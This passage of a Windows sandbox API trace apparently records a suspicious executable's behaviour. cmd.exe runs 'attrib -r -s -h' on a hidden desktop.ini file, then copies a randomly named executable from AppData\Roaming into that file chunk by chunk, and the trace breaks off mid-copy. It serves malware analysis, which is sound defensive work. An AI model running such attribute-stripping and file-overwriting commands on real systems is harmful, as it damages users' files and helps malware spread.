GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x350650, lpFilePart=0x2af124 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af124*="Desktop") returned 0x18 [0128.764] SetErrorMode (uMode=0x0) returned 0x1 [0128.764] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0128.764] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0128.768] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0128.769] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aeea0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeea0) returned 0xffffffff [0128.769] GetLastError () returned 0x2 [0128.769] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2aeea0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeea0) returned 0xffffffff [0128.769] GetLastError () returned 0x2 [0128.769] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aeea0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeea0) returned 0x350938 [0128.769] FindClose (in: hFindFile=0x350938 | out: hFindFile=0x350938) returned 1 [0128.770] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2aeea0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeea0) returned 0xffffffff [0128.770] GetLastError () returned 0x2 [0128.770] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aeea0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeea0) returned 0x350938 [0128.770] FindClose (in: hFindFile=0x350938 | out: hFindFile=0x350938) returned 1 [0128.770] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0128.770] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0128.770] GetConsoleTitleW (in: lpConsoleTitle=0x2af398, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.812] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af220, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af2e8 | out: lpAttributeList=0x2af220, lpSize=0x2af2e8) returned 1 [0128.812] UpdateProcThreadAttribute (in: lpAttributeList=0x2af220, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af2e0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af220, lpPreviousValue=0x0) returned 1 [0128.812] GetStartupInfoW (in: lpStartupInfo=0x2af1dc | out: lpStartupInfo=0x2af1dc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0128.812] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0128.813] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af27c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af2c8 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" ", lpProcessInformation=0x2af2c8*(hProcess=0x50, hThread=0x4c, dwProcessId=0x6bc, dwThreadId=0x514)) returned 1 [0128.815] CloseHandle (hObject=0x4c) returned 1 [0128.815] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0128.815] GetEnvironmentStringsW () returned 0x350bc8* [0128.816] FreeEnvironmentStringsW (penv=0x350bc8) returned 1 [0128.816] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0128.913] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2af1bc | out: lpExitCode=0x2af1bc*=0x0) returned 1 [0128.913] CloseHandle (hObject=0x50) returned 1 [0128.913] _vsnwprintf (in: _Buffer=0x2af304, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af1c8 | out: _Buffer="00000000") returned 8 [0128.913] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0128.913] GetEnvironmentStringsW () returned 0x3526d0* [0128.913] FreeEnvironmentStringsW (penv=0x3526d0) returned 1 [0128.913] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0128.913] GetEnvironmentStringsW () returned 0x3526d0* [0128.913] FreeEnvironmentStringsW (penv=0x3526d0) returned 1 [0128.913] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af220 | out: lpAttributeList=0x2af220) [0128.913] GetConsoleTitleW (in: lpConsoleTitle=0x2af5a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.914] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2ae618, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x2ae61c, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2ae618*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0128.914] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0128.914] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0128.914] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0128.914] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\desktop.ini")) returned 0xffffffff [0128.914] GetLastError () returned 0x2 [0128.914] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1")) returned 0x10 [0128.914] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0128.915] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0128.915] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\desktop.ini")) returned 0xffffffff [0128.915] GetLastError () returned 0x2 [0128.915] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x35384c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x35384c) returned 0xffffffff [0128.915] GetLastError () returned 0x2 [0128.915] _get_osfhandle (_FileHandle=2) returned 0xb [0128.915] GetFileType (hFile=0xb) returned 0x2 [0128.915] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0128.915] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2af018 | out: lpMode=0x2af018) returned 1 [0128.915] _get_osfhandle (_FileHandle=2) returned 0xb [0128.915] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2af04c | out: lpConsoleScreenBufferInfo=0x2af04c) returned 1 [0128.915] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0128.916] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.916] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.916] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.916] GetFileType (hFile=0x7) returned 0x2 [0128.916] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0128.916] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af73c | out: lpMode=0x2af73c) returned 1 [0128.916] _dup (_FileHandle=1) returned 3 [0128.917] _close (_FileHandle=1) returned 0 [0128.917] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini", _String2="con") returned -53 [0128.917] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2af70c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0128.917] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0128.917] GetConsoleTitleW (in: lpConsoleTitle=0x2af53c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.917] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x2af0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2af0a0) returned 0x34e760 [0128.917] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0128.917] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0128.917] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0128.918] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2adfac, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0128.918] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0128.918] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.918] GetFileType (hFile=0x58) returned 0x1 [0128.918] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.918] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x2ae004 | out: lpFileSizeHigh=0x2ae004*=0x0) returned 0x7d600 [0128.918] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.918] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.918] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.918] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.918] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.918] GetFileType (hFile=0x50) returned 0x1 [0128.918] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.918] GetFileType (hFile=0x50) returned 0x1 [0128.918] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.918] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.919] GetFileType (hFile=0x50) returned 0x1 [0128.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.919] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.919] GetFileType (hFile=0x50) returned 0x1 [0128.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.919] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.919] GetFileType (hFile=0x50) returned 0x1 [0128.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.919] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.920] GetFileType (hFile=0x50) returned 0x1 [0128.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.920] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.920] GetFileType (hFile=0x50) returned 0x1 [0128.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.920] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.920] GetFileType (hFile=0x50) returned 0x1 [0128.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.920] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.920] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.920] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.920] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.920] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.920] GetFileType (hFile=0x50) returned 0x1 [0128.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.920] GetFileType (hFile=0x50) returned 0x1 [0128.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.920] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.920] GetFileType (hFile=0x50) returned 0x1 [0128.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.920] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.920] GetFileType (hFile=0x50) returned 0x1 [0128.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.920] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.921] GetFileType (hFile=0x50) returned 0x1 [0128.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.921] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.921] GetFileType (hFile=0x50) returned 0x1 [0128.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.921] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.921] GetFileType (hFile=0x50) returned 0x1 [0128.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.921] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.921] GetFileType (hFile=0x50) returned 0x1 [0128.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.921] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.921] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.921] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.921] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.921] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.921] GetFileType (hFile=0x50) returned 0x1 [0128.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.921] GetFileType (hFile=0x50) returned 0x1 [0128.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.921] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.921] GetFileType (hFile=0x50) returned 0x1 [0128.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.921] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.921] GetFileType (hFile=0x50) returned 0x1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] GetFileType (hFile=0x50) returned 0x1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] GetFileType (hFile=0x50) returned 0x1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] GetFileType (hFile=0x50) returned 0x1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] GetFileType (hFile=0x50) returned 0x1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.922] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.922] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.922] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.922] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] GetFileType (hFile=0x50) returned 0x1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] GetFileType (hFile=0x50) returned 0x1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] GetFileType (hFile=0x50) returned 0x1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.922] GetFileType (hFile=0x50) returned 0x1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] GetFileType (hFile=0x50) returned 0x1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] GetFileType (hFile=0x50) returned 0x1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] GetFileType (hFile=0x50) returned 0x1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] GetFileType (hFile=0x50) returned 0x1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.923] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.923] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.923] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.923] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] GetFileType (hFile=0x50) returned 0x1 [0128.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.923] GetFileType (hFile=0x50) returned 0x1 